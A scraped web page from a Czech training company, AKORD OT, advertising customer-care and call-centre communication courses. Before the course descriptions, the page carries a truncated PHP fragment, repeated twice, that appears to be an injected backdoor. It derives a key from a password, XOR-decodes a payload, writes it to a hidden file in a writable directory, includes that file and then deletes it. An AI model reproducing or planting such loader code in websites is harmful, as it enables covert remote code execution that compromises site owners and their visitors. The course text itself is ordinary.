100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> 100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> Péče o zákazníka - AKORD OT

Péče o zákazníka

Víme, jak rozvíjet pracovníky call center a zákaznického servisu, aby byli vaši klienti vždy spokojeni.

Trénink pracovníků call center

Zaměření kurzu, komu je kurz určen
Kurz je určen pro pracovníky CALL CENTER, kteří jsou v každodenním kontaktu s klienty po telefonu. Cílem kurzu je zlepšit profesionální přístup k telefonování se zákazníkem důrazem na individuální přístup. Naučit se efektivně v limitovaném čase vést rozhovor a zvládnout obtížné situace, které vedou ke stresům a brání dosáhnout dohody/řešení s klientem.

Dílčí témata kurzu
Specifika telefonické komunikace – zásady správného telefonování (co  může „znechutit“ při telefonování, profesionální chování při telefonování), procesní a osobní stránka servisu zákazníkům, struktura telefonického rozhovoru – kladení otázek, zjišťování potřeb, odpovědnost pracovníka za průběh rozhovoru, jednání s obtížnými klienty a řešení stížností a konfliktních situací, zvládání emocí.


Efektivní osobní komunikace s klientem

Zaměření kurzu, komu je kurz určen
Kurz je určen pro pracovníky zákaznických center, kteří se každý den setkávají osobně se zákazníky. Cílem kurzu je zvýšit profesionalitu v jednání s klienty, uvědomit si výhody individuálního přístupu, naučit se efektivně využít omezeného času pro úspěšné vedení rozhovoru. Zvládnout obtížné situace, zlepšit profesionální přístup k jednání se zákazníkem. Vyrovnat se s obtížnými a stresovými situacemi, které brání dosažení dohody/řešení s klientem.

Dílčí témata kurzu
Úspěšný vstup do jednání, struktura rozhovoru, vedení rozhovoru, srozumitelnost informací, ověřování pochopení klientova sdělení, procesní a osobní stránka servisu zákazníkům, reprezentování firmy jako celku, jak svým vyjadřováním podpořit prestiž firemní značky, jednání s obtížnými klienty a řešení stížností a konfliktních situací, zvládání emocí.


Další možná témata kurzů a konzultací

  • Rétorika pro telefonní rozhovory
  • Prodejní telefonické rozhovory
  • Trénink telefonické komunikace pro asistentky
  • Individuální konzultace k nastavení call scriptu
  • Elektronická komunikace se zákazníkem
  • Jak se vyrovnat se stresem

Comments are closed.